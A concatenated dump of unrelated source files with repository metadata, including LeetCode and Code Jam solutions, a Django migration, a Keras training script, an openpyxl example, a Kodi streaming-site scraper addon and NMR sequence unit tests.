ChangeNozzlePressureAndColorFountainCommand(2, 3.14, 'red', 2),
ChangeNozzlePressureAndColorFountainCommand(5, 0, 'yellow', 10)],
program.commands)
| [
"0coming.soon@gmail.com"
] | 0coming.soon@gmail.com |
016b7f14678ca082a128d9d26d7fe538516f88ca | 298c86756b741b4c0b706f5178fd26d6d3b63541 | /src/301_400/0330_patching-array/patching-array.py | 272322d30bc46a5f36cd0da0e961270b3653ad2b | [
"Apache-2.0"
] | permissive | himichael/LeetCode | c1bd6afd55479440c21906bf1a0b79a658bb662f | 4c19fa86b5fa91b1c76d2c6d19d1d2ef14bdff97 | refs/heads/master | 2023-02-12T07:25:22.693175 | 2023-01-28T10:41:31 | 2023-01-28T10:41:31 | 185,511,218 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | class Solution:
def minPatches(self, nums: List[int], n: int) -> int:
patches, x = 0, 1
length, index = len(nums), 0
while x <= n:
if index < length and nums[index] <= x:
x += nums[index]
index += 1
else:
x <<= 1
patches += 1
return patches
| [
"michaelwangg@qq.com"
] | michaelwangg@qq.com |
8235e8dcebb8c85c71c21f2c8a9467bf62a6ff4b | e5a511e346f5be8a82fe9cb2edf457aa7e82859c | /Python/ListPrograms/shuffleList.py | 87719058859c7a7cc65a26310471c5e2ace1e816 | [] | no_license | nekapoor7/Python-and-Django | 8397561c78e599abc8755887cbed39ebef8d27dc | 8fa4d15f4fa964634ad6a89bd4d8588aa045e24f | refs/heads/master | 2022-10-10T20:23:02.673600 | 2020-06-11T09:06:42 | 2020-06-11T09:06:42 | 257,163,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | """Write a Python program to shuffle and print a specified list. """
from random import shuffle
words = list(input().split())
shuffle(words)
print(words) | [
"neha.kapoor070789@gmail.com"
] | neha.kapoor070789@gmail.com |
35e12a74b76bdfabf580cd443df340d7e4f27584 | 565548ff49844ed69ae16d5104e500f01c973402 | /models/PST.py | 2592e69433fc0f5746b4d5cfa9e4f09e85a9eae1 | [] | no_license | jaisenbe58r/Pebrassos | 159ce5a8b372590fd9368d9b5b3c1b0513895bba | 7516a1f7bbba78547af86a9858ee381224964d28 | refs/heads/master | 2023-02-27T05:42:50.652697 | 2021-01-31T20:57:59 | 2021-01-31T20:57:59 | 299,698,630 | 3 | 1 | null | 2021-01-31T20:58:01 | 2020-09-29T18:04:36 | Jupyter Notebook | UTF-8 | Python | false | false | 1,169 | py | """Copyright (c) 2020 Jaime Sendra Berenguer & Carlos Mahiques Ballester
Pebrassos - Machine Learning Library Extensions
Author:Jaime Sendra Berenguer & Carlos Mahiques Ballester
<www.linkedin.com/in/jaisenbe>
License: MIT
"""
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from Helpers import utils
from Model import Embed, Checkpoint
EPOCHS=80
PASOS=7
# Carga de datos para el entrenamiento
scaler, training_data, target_data, valid_data, valid_target, continuas, valid_continuas = utils.load_data(PASOS)
# Modelo a utilizar
model = Embed.crear_modeloEmbeddings(PASOS)
#Entrenamiento
history = model.fit([training_data['weekday'],training_data['month'],continuas], target_data, epochs=EPOCHS,
validation_data=([valid_data['weekday'],valid_data['month'],valid_continuas],valid_target))
# Guardamos Checkpoint del modelo
Checkpoint.save_model(model, scaler)
# Predicción de resultados
results = model.predict([valid_data['weekday'],valid_data['month'],valid_continuas])
print( 'Resultados escalados',results )
inverted = scaler.inverse_transform(results)
print( 'Resultados',inverted ) | [
"jsendra@autis.es"
] | jsendra@autis.es |
bbf4f55b09e09fe087a85c3b9f7f3de103ee6cff | 7c5b8af0ef2af6f43fad895bae835ea323b2c236 | /accounts/migrations/0001_initial.py | 76ce2fcad8a9b87b624eb374769fc175fa18fb89 | [] | no_license | Tushant/ariadne_tutorial | 51f0d30b79172adc7548b43db9d5abe4048464a6 | 73b9054a88df1d130cbc965e4c6e1d33c5a38063 | refs/heads/master | 2021-11-23T11:25:59.885883 | 2020-01-25T11:05:55 | 2020-01-25T11:05:55 | 236,158,115 | 1 | 1 | null | 2021-11-01T06:52:23 | 2020-01-25T10:56:34 | Python | UTF-8 | Python | false | false | 8,421 | py | # Generated by Django 3.0.2 on 2020-01-25 05:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(default='profile_default.jpg', upload_to='profile_images')),
('social_accounts', models.TextField(blank=True)),
('time_zone', models.CharField(blank=True, choices=[('-12.0', '(GMT -12:00) Eniwetok, Kwajalein'), ('-11.0', '(GMT -11:00) Midway Island, Samoa'), ('-10.0', '(GMT -10:00) Hawaii'), ('-9.0', '(GMT -9:00) Alaska'), ('-8.0', '(GMT -8:00) Pacific Time (US & Canada)'), ('-7.0', '(GMT -7:00) Mountain Time (US & Canada)'), ('-6.0', '(GMT -6:00) Central Time (US & Canada), Mexico City'), ('-5.0', '(GMT -5:00) Eastern Time (US & Canada), Bogota, Lima'), ('-4.0', '(GMT -4:00) Atlantic Time (Canada), Caracas, La Paz'), ('-3.5', '(GMT -3:30) Newfoundland'), ('-3.0', '(GMT -3:00) Brazil, Buenos Aires, Georgetown'), ('-2.0', '(GMT -2:00) Mid-Atlantic'), ('-1.0', '(GMT -1:00 hour) Azores, Cape Verde Islands'), ('0.0', '(GMT) Western Europe Time, London, Lisbon, Casablanca'), ('1.0', '(GMT +1:00 hour) Brussels, Copenhagen, Madrid, Paris'), ('2.0', '(GMT +2:00) Kaliningrad, South Africa'), ('3.0', '(GMT +3:00) Baghdad, Riyadh, Moscow, St. Petersburg'), ('3.5', '(GMT +3:30) Tehran'), ('4.0', '(GMT +4:00) Abu Dhabi, Muscat, Baku, Tbilisi'), ('4.5', '(GMT +4:30) Kabul'), ('5.0', '(GMT +5:00) Ekaterinburg, Islamabad, Karachi, Tashkent'), ('5.5', '(GMT +5:30) Bombay, Calcutta, Madras, New Delhi'), ('5.75', '(GMT +5:45) Kathmandu'), ('6.0', '(GMT +6:00) Almaty, Dhaka, Colombo'), ('7.0', '(GMT +7:00) Bangkok, Hanoi, Jakarta'), ('8.0', '(GMT +8:00) Beijing, Perth, Singapore, Hong Kong'), ('9.0', '(GMT +9:00) Tokyo, Seoul, Osaka, Sapporo, Yakutsk'), ('9.5', '(GMT +9:30) Adelaide, Darwin'), ('10.0', '(GMT +10:00) Eastern Australia, Guam, Vladivostok'), ('11.0', '(GMT +11:00) Magadan, Solomon Islands, New Caledonia'), ('12.0', '(GMT +12:00) Auckland, Wellington, Fiji, Kamchatka')], max_length=5)),
('languages', multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('aa', 'Afar'), ('ab', 'Abkhazian'), ('af', 'Afrikaans'), ('ak', 'Akan'), ('sq', 'Albanian'), ('am', 'Amharic'), ('ar', 'Arabic'), ('an', 'Aragonese'), ('hy', 'Armenian'), ('as', 'Assamese'), ('av', 'Avaric'), ('ae', 'Avestan'), ('ay', 'Aymara'), ('az', 'Azerbaijani'), ('ba', 'Bashkir'), ('bm', 'Bambara'), ('eu', 'Basque'), ('be', 'Belarusian'), ('bn', 'Bengali'), ('bh', 'Bihari languages'), ('bi', 'Bislama'), ('bo', 'Tibetan'), ('bs', 'Bosnian'), ('br', 'Breton'), ('bg', 'Bulgarian'), ('my', 'Burmese'), ('ca', 'Catalan; Valencian'), ('cs', 'Czech'), ('ch', 'Chamorro'), ('ce', 'Chechen'), ('zh', 'Chinese'), ('cu', 'Church Slavic; Old Slavonic; Church Slavonic; Old Bulgarian; Old Church Slavonic'), ('cv', 'Chuvash'), ('kw', 'Cornish'), ('co', 'Corsican'), ('cr', 'Cree'), ('cy', 'Welsh'), ('cs', 'Czech'), ('da', 'Danish'), ('de', 'German'), ('dv', 'Divehi; Dhivehi; Maldivian'), ('nl', 'Dutch; Flemish'), ('dz', 'Dzongkha'), ('el', 'Greek, Modern (1453-)'), ('en', 'English'), ('eo', 'Esperanto'), ('et', 'Estonian'), ('eu', 'Basque'), ('ee', 'Ewe'), ('fo', 'Faroese'), ('fa', 'Persian'), ('fj', 'Fijian'), ('fi', 'Finnish'), ('fr', 'French'), ('fy', 'Western Frisian'), ('ff', 'Fulah'), ('Ga', 'Georgian'), ('de', 'German'), ('gd', 'Gaelic; Scottish Gaelic'), ('ga', 'Irish'), ('gl', 'Galician'), ('gv', 'Manx'), ('el', 'Greek, Modern (1453-)'), ('gn', 'Guarani'), ('gu', 'Gujarati'), ('ht', 'Haitian; Haitian Creole'), ('ha', 'Hausa'), ('he', 'Hebrew'), ('hz', 'Herero'), ('hi', 'Hindi'), ('ho', 'Hiri Motu'), ('hr', 'Croatian'), ('hu', 'Hungarian'), ('hy', 'Armenian'), ('ig', 'Igbo'), ('is', 'Icelandic'), ('io', 'Ido'), ('ii', 'Sichuan Yi; Nuosu'), ('iu', 'Inuktitut'), ('ie', 'Interlingue; Occidental'), ('ia', 'Interlingua (International Auxiliary Language Association)'), ('id', 'Indonesian'), ('ik', 'Inupiaq'), ('is', 'Icelandic'), ('it', 'Italian'), ('jv', 'Javanese'), ('ja', 'Japanese'), ('kl', 'Kalaallisut; Greenlandic'), ('kn', 'Kannada'), ('ks', 'Kashmiri'), ('ka', 'Georgian'), ('kr', 'Kanuri'), ('kk', 'Kazakh'), ('km', 'Central Khmer'), ('ki', 'Kikuyu; Gikuyu'), ('rw', 'Kinyarwanda'), ('ky', 'Kirghiz; Kyrgyz'), ('kv', 'Komi'), ('kg', 'Kongo'), ('ko', 'Korean'), ('kj', 'Kuanyama; Kwanyama'), ('ku', 'Kurdish'), ('lo', 'Lao'), ('la', 'Latin'), ('lv', 'Latvian'), ('li', 'Limburgan; Limburger; Limburgish'), ('ln', 'Lingala'), ('lt', 'Lithuanian'), ('lb', 'Luxembourgish; Letzeburgesch'), ('lu', 'Luba-Katanga'), ('lg', 'Ganda'), ('mk', 'Macedonian'), ('mh', 'Marshallese'), ('ml', 'Malayalam'), ('mi', 'Maori'), ('mr', 'Marathi'), ('ms', 'Malay'), ('Mi', 'Micmac'), ('mk', 'Macedonian'), ('mg', 'Malagasy'), ('mt', 'Maltese'), ('mn', 'Mongolian'), ('mi', 'Maori'), ('ms', 'Malay'), ('my', 'Burmese'), ('na', 'Nauru'), ('nv', 'Navajo; Navaho'), ('nr', 'Ndebele, South; South Ndebele'), ('nd', 'Ndebele, North; North Ndebele'), ('ng', 'Ndonga'), ('ne', 'Nepali'), ('nl', 'Dutch; Flemish'), ('nn', 'Norwegian Nynorsk; Nynorsk, Norwegian'), ('nb', 'Bokmål, Norwegian; Norwegian Bokmål'), ('no', 'Norwegian'), ('oc', 'Occitan (post 1500)'), ('oj', 'Ojibwa'), ('or', 'Oriya'), ('om', 'Oromo'), ('os', 'Ossetian; Ossetic'), ('pa', 'Panjabi; Punjabi'), ('fa', 'Persian'), ('pi', 'Pali'), ('pl', 'Polish'), ('pt', 'Portuguese'), ('ps', 'Pushto; Pashto'), ('qu', 'Quechua'), ('rm', 'Romansh'), ('ro', 'Romanian; Moldavian; Moldovan'), ('ro', 'Romanian; Moldavian; Moldovan'), ('rn', 'Rundi'), ('ru', 'Russian'), ('sg', 'Sango'), ('sa', 'Sanskrit'), ('si', 'Sinhala; Sinhalese'), ('sk', 'Slovak'), ('sk', 'Slovak'), ('sl', 'Slovenian'), ('se', 'Northern Sami'), ('sm', 'Samoan'), ('sn', 'Shona'), ('sd', 'Sindhi'), ('so', 'Somali'), ('st', 'Sotho, Southern'), ('es', 'Spanish; Castilian'), ('sq', 'Albanian'), ('sc', 'Sardinian'), ('sr', 'Serbian'), ('ss', 'Swati'), ('su', 'Sundanese'), ('sw', 'Swahili'), ('sv', 'Swedish'), ('ty', 'Tahitian'), ('ta', 'Tamil'), ('tt', 'Tatar'), ('te', 'Telugu'), ('tg', 'Tajik'), ('tl', 'Tagalog'), ('th', 'Thai'), ('bo', 'Tibetan'), ('ti', 'Tigrinya'), ('to', 'Tonga (Tonga Islands)'), ('tn', 'Tswana'), ('ts', 'Tsonga'), ('tk', 'Turkmen'), ('tr', 'Turkish'), ('tw', 'Twi'), ('ug', 'Uighur; Uyghur'), ('uk', 'Ukrainian'), ('ur', 'Urdu'), ('uz', 'Uzbek'), ('ve', 'Venda'), ('vi', 'Vietnamese'), ('vo', 'Volapük'), ('cy', 'Welsh'), ('wa', 'Walloon'), ('wo', 'Wolof'), ('xh', 'Xhosa'), ('yi', 'Yiddish'), ('yo', 'Yoruba'), ('za', 'Zhuang; Chuang'), ('zh', 'Chinese'), ('zu', 'Zulu')], max_length=608)),
('stripe_customer_id', models.CharField(blank=True, max_length=50, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Freelancer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bio', models.TextField()),
('technologies', multiselectfield.db.fields.MultiSelectField(choices=[('html', 'HTML'), ('css', 'CSS'), ('js', 'JavaScript'), ('jq', 'JQuery'), ('re', 'React'), ('an', 'Angular'), ('vu', 'Vue'), ('php', 'PHP'), ('lv', 'Laravel'), ('sy', 'Symfony'), ('no', 'Node.js'), ('ex', 'Express.js'), ('my', 'MySQL'), ('ps', 'PostgresQl'), ('md', 'MongoDB'), ('py', 'Python'), ('dj', 'Django'), ('fl', 'Flask'), ('ja', 'Java'), ('c', 'C'), ('cpp', 'C++'), ('cs', 'C#'), ('oc', 'Objective-C'), ('sw', 'Swift'), ('go', 'Go'), ('rs', 'Rust'), ('rb', 'Ruby'), ('rr', 'Ruby On rails')], max_length=87)),
('stripe_account_id', models.CharField(blank=True, max_length=50, null=True)),
('active', models.BooleanField(default=False)),
('profile', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='accounts.Profile')),
],
),
]
| [
"programmertushant@gmail.com"
] | programmertushant@gmail.com |
8760723ee95d31f6a5cbdb418e9be59736b266df | 931ae36e876b474a5343d0608ef41da6b33f1048 | /062.py | 65898c09041b8f9ab2b9ef1e6e95318adaac13bd | [] | no_license | mucollabo/py100 | 07fc10164b1335ad45a55b6af4767948cf18ee28 | 6361398e61cb5b014d2996099c3acfe604ee457c | refs/heads/master | 2023-01-27T13:48:57.807514 | 2020-12-10T12:49:10 | 2020-12-10T12:49:10 | 267,203,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | import openpyxl
from openpyxl.styles import Alignment
import os
# 워크북(Workbook) 객체 만들기
wb = openpyxl.Workbook()
# 시트(Sheet) 객체 만들기
ws = wb.create_sheet(index=0, title='Merge')
wb.remove(wb['Sheet'])
# 데이터 입력하기
tuple_of_rows = ((1, 2),
(3, 4),
(5, 6),
(7, 8),
(9, 10),
)
for row in tuple_of_rows:
ws.append(row)
print(row)
ws.merge_cells(start_row=1, start_column=1, end_row=2, end_column=2)
A1 = ws.cell(row=1, column=1)
A1.value = 'Merged'
A1.alignment = Alignment(horizontal='center', vertical='center')
# 워크북의 변경내용을 새로운 파일에 저장
wb.save(os.path.join(os.getcwd(), 'output', 'create_workbook3.xlsx'))
| [
"mucollabo@gmail.com"
] | mucollabo@gmail.com |
cff20af9ca952b1c601ab44b87a8efd7effd6b35 | cff2b7c96ca0355a44116f6d18f026da69e412b0 | /script.module.Galaxy/lib/resources/lib/sources/en/Galaxy (31).py | 393be8d1d8c6c5e1d22fd97aa6d10bfc39403e53 | [
"Beerware"
] | permissive | krazware/therealufo | cc836e4e7049d277205bb590d75d172f5745cb7d | 4d6341c77e8c2cc9faec0f748a9a2d931b368217 | refs/heads/master | 2020-03-19T00:41:22.109154 | 2019-11-12T05:06:14 | 2019-11-12T05:06:14 | 135,496,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,918 | py | '''
The Martian Add-on
***FSPM was here*****
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re, urlparse, urllib, base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import cache
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['solarmovie.net']
self.base_link = 'http://solarmovie.net'
self.search_link = '/search-movies/%s.html'
def movie(self, imdb, title, localtitle, aliases, year):
try:
clean_title = cleantitle.geturl(title)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('.+?elease:\s*(\d{4})</', i),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0], i[2][0]) for i in r if
(cleantitle.get(i[2][0]) == cleantitle.get(title) and i[1][0] == year)]
url = r[0][0]
return url
except Exception:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['premiered'], url['season'], url['episode'] = premiered, season, episode
try:
clean_title = cleantitle.geturl(url['tvshowtitle'])+'-season-%d' % int(season)
search_url = urlparse.urljoin(self.base_link, self.search_link % clean_title.replace('-', '+'))
r = cache.get(client.request, 1, search_url)
r = client.parseDOM(r, 'div', {'id': 'movie-featured'})
r = [(client.parseDOM(i, 'a', ret='href'),
re.findall('<b><i>(.+?)</i>', i)) for i in r]
r = [(i[0][0], i[1][0]) for i in r if
cleantitle.get(i[1][0]) == cleantitle.get(clean_title)]
url = r[0][0]
except:
pass
data = client.request(url)
data = client.parseDOM(data, 'div', attrs={'id': 'details'})
data = zip(client.parseDOM(data, 'a'), client.parseDOM(data, 'a', ret='href'))
url = [(i[0], i[1]) for i in data if i[0] == str(int(episode))]
return url[0][1]
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
r = cache.get(client.request, 1, url)
try:
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', r)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
try:
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
except:
pass
r = client.parseDOM(r, 'div', {'class': 'server_line'})
r = [(client.parseDOM(i, 'a', ret='href')[0], client.parseDOM(i, 'p', attrs={'class': 'server_servername'})[0]) for i in r]
if r:
for i in r:
try:
host = re.sub('Server|Link\s*\d+', '', i[1]).lower()
url = i[0]
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
if 'other'in host: continue
sources.append({
'source': host,
'quality': 'SD',
'language': 'en',
'url': url.replace('\/', '/'),
'direct': False,
'debridonly': False
})
except:
pass
return sources
except Exception:
return
def resolve(self, url):
if self.base_link in url:
url = client.request(url)
v = re.findall('document.write\(Base64.decode\("(.+?)"\)', url)[0]
b64 = base64.b64decode(v)
url = client.parseDOM(b64, 'iframe', ret='src')[0]
return url
| [
"krazinabox@gmail.com"
] | krazinabox@gmail.com |
084b701db876a7a9cc96de46ba22410822435bef | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/2768.py | 40e17f65e0ef41dbbc7a6fbe6147c990164a2ac2 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | T = int(input())
for t in range(1, T + 1):
result = ""
N, K = [int(i) for i in input().split(" ")]
if N == K:
result = "{} {}".format(0, 0)
else:
s = [0 for i in range(N)]
for c in range(K):
Ls = [0 for i in range(N)]
Rs = [0 for i in range(N)]
for i in range(N):
if s[i] == 0:
try:
Ls[i] = s[i::-1].index(1) - 1
except ValueError:
Ls[i] = i
try:
Rs[i] = s[i+1:].index(1)
except ValueError:
Rs[i] = N - i - 1
mini = [min(Ls[i], Rs[i]) if s[i] == 0 else -1 for i in range(N)]
minimum = max(mini)
minIndex = [i for i in range(N) if mini[i] == minimum]
maxi = [max(Ls[i], Rs[i]) if i in minIndex else -1 for i in range(N)]
maxIndex = maxi.index(max(maxi))
maximum = max(maxi)
if len(minIndex) == 1:
s[minIndex[0]] = 1
else:
s[maxIndex] = 1
result = "{} {}".format(maximum, minimum)
print("Case #{}: {}".format(t, result)) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
c92647660bee53af23986221cb7ab6c32ab5ce7f | 8a3d282ffb9830b01a3b698e2930ba8da6617d99 | /Lesson4/exercise1.py | 325205e8b230c4e4ebd0d2c7fbf211e9164ab04a | [] | no_license | papri-entropy/pynet-py3 | 08ba96adc9e0163990c7a8064ed8207b898748ff | 5554fa8a61b2e57f652046815e60f1b6db361d1e | refs/heads/master | 2023-04-03T17:51:45.105739 | 2021-04-15T14:33:05 | 2021-04-15T14:33:05 | 344,288,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
"""
1. Create a dictionary representing a network device. The dictionary should have key-value pairs representing the 'ip_addr', 'vendor', 'username', and 'password' fields.
Print out the 'ip_addr' key from the dictionary.
If the 'vendor' key is 'cisco', then set the 'platform' to 'ios'. If the 'vendor' key is 'juniper', then set the 'platform' to 'junos'.
Create a second dictionary named 'bgp_fields'. The 'bgp_fields' dictionary should have a keys for 'bgp_as', 'peer_as', and 'peer_ip'.
Using the .update() method add all of the 'bgp_fields' dictionary key-value pairs to the network device dictionary.
Using a for-loop, iterate over the dictionary and print out all of the dictionary keys.
Using a single for-loop, iterate over the dictionary and print out all of the dictionary keys and values.
"""
from pprint import pprint
device = {
'ip_addr': '4.4.4.4',
'vendor': 'cisco',
'username': 'admin',
'password': 'secret'
}
print("*" * 80)
print(device['ip_addr'])
print("*" * 80)
if device['vendor'].lower() == 'cisco':
device['platform'] = 'ios'
elif device['vendor'].lower() == 'juniper':
device['platform'] = 'junos'
print("*" * 80)
print(device['platform'])
print("*" * 80)
bgp_fields = {
'bgp_as': 65000,
'peer_as': 65001,
'peer_ip': "1.1.1.2"
}
device.update(bgp_fields)
for key in device.keys():
print(key)
print("*" * 80)
for key, value in device.items():
print(f"{key:>15} ---> {value:>15}") | [
"cosminpetrache4@gmail.com"
] | cosminpetrache4@gmail.com |
1c77ea48c7fcd5eb428149cef29095ba678ce323 | d9a22d4dcdfc0c28176c0e8afd784b30d275597e | /test_suite/system_tests/sequence.py | 6366e36289697ac02974e7ee733bfa98c9e73436 | [] | no_license | jlec/relax | fda1b3ff77be0afc21c2e6cc52348ae7635cd07a | c317326ddeacd1a1c608128769676899daeae531 | refs/heads/master | 2016-09-08T00:27:57.256090 | 2015-02-10T12:24:55 | 2015-02-10T12:24:55 | 30,596,131 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,738 | py | ###############################################################################
# #
# Copyright (C) 2006-2015 Edward d'Auvergne #
# Copyright (C) 2013-2014 Troels E. Linnet #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
# Python module imports.
from os import sep
# relax module imports.
from data_store import Relax_data_store; ds = Relax_data_store()
from status import Status; status = Status()
from test_suite.system_tests.base_classes import SystemTestCase
class Sequence(SystemTestCase):
"""Class for testing the sequence functions."""
def setUp(self):
"""Set up for all the functional tests."""
# Create the data pipe.
self.interpreter.pipe.create('mf', 'mf')
def test_load_protein_asp_atoms_from_pdb(self):
"""Load all aspartic acid atoms from the single residue in a loaded protein PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Load all the ASP atoms (1 molecule, 1 ASP residue, and all atoms).
self.interpreter.structure.load_spins(spin_id=':ASP')
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 1)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 7)
self.assertEqual(cdp.mol[0].res[0].name, 'ASP')
self.assertEqual(len(cdp.mol[0].res[0].spin), 12)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 78)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[0].spin[1].num, 79)
self.assertEqual(cdp.mol[0].res[0].spin[1].name, 'H')
self.assertEqual(cdp.mol[0].res[0].spin[2].num, 80)
self.assertEqual(cdp.mol[0].res[0].spin[2].name, 'CA')
self.assertEqual(cdp.mol[0].res[0].spin[3].num, 81)
self.assertEqual(cdp.mol[0].res[0].spin[3].name, 'HA')
self.assertEqual(cdp.mol[0].res[0].spin[4].num, 82)
self.assertEqual(cdp.mol[0].res[0].spin[4].name, 'CB')
self.assertEqual(cdp.mol[0].res[0].spin[5].num, 83)
self.assertEqual(cdp.mol[0].res[0].spin[5].name, '1HB')
self.assertEqual(cdp.mol[0].res[0].spin[6].num, 84)
self.assertEqual(cdp.mol[0].res[0].spin[6].name, '2HB')
self.assertEqual(cdp.mol[0].res[0].spin[7].num, 85)
self.assertEqual(cdp.mol[0].res[0].spin[7].name, 'CG')
self.assertEqual(cdp.mol[0].res[0].spin[8].num, 86)
self.assertEqual(cdp.mol[0].res[0].spin[8].name, 'OD1')
self.assertEqual(cdp.mol[0].res[0].spin[9].num, 87)
self.assertEqual(cdp.mol[0].res[0].spin[9].name, 'OD2')
self.assertEqual(cdp.mol[0].res[0].spin[10].num, 88)
self.assertEqual(cdp.mol[0].res[0].spin[10].name, 'C')
self.assertEqual(cdp.mol[0].res[0].spin[11].num, 89)
self.assertEqual(cdp.mol[0].res[0].spin[11].name, 'O')
def test_load_protein_gly_N_Ca_spins_from_pdb(self):
"""Load the glycine backbone amide N and Ca spins from a loaded protein PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Generate the sequence of nitrogen spins (1 molecule, all GLY residues, and only N spins).
self.interpreter.structure.load_spins(spin_id=':GLY@N')
# Append to the sequence the alpha carbon spins (1 molecule, all GLY residues, and only Ca spins).
self.interpreter.structure.load_spins(spin_id=':GLY@CA')
# Test some of the sequence.
self.assertEqual(len(cdp.mol), 1)
self.assertEqual(cdp.mol[0].name, 'Ap4Aase_res1-12_mol1')
self.assertEqual(len(cdp.mol[0].res), 3)
# 1st residue.
self.assertEqual(cdp.mol[0].res[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[0].spin), 2)
self.assertEqual(cdp.mol[0].res[0].spin[0].num, 1)
self.assertEqual(cdp.mol[0].res[0].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[0].spin[1].num, 2)
self.assertEqual(cdp.mol[0].res[0].spin[1].name, 'CA')
# 2nd residue.
self.assertEqual(cdp.mol[0].res[1].num, 4)
self.assertEqual(cdp.mol[0].res[1].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[1].spin), 2)
self.assertEqual(cdp.mol[0].res[1].spin[0].num, 43)
self.assertEqual(cdp.mol[0].res[1].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[1].spin[1].num, 45)
self.assertEqual(cdp.mol[0].res[1].spin[1].name, 'CA')
# 3rd residue.
self.assertEqual(cdp.mol[0].res[2].num, 12)
self.assertEqual(cdp.mol[0].res[2].name, 'GLY')
self.assertEqual(len(cdp.mol[0].res[2].spin), 2)
self.assertEqual(cdp.mol[0].res[2].spin[0].num, 144)
self.assertEqual(cdp.mol[0].res[2].spin[0].name, 'N')
self.assertEqual(cdp.mol[0].res[2].spin[1].num, 146)
self.assertEqual(cdp.mol[0].res[2].spin[1].name, 'CA')
def test_load_protein_gly_N_spins_from_pdb(self):
"""Load the glycine backbone amide N spins from a loaded protein PDB file."""
# Read the PDB file.
self.interpreter.structure.read_pdb(file='Ap4Aase_res1-12.pdb', dir=status.install_path + sep+'test_suite'+sep+'shared_data'+sep+'structures', read_model=1)
# Generate the sequence (1 molecule, all GLY residues, and only N spins).
self.interpreter.structure.load_spins(spin_id=':GLY@N')
# Test some of the sequence.
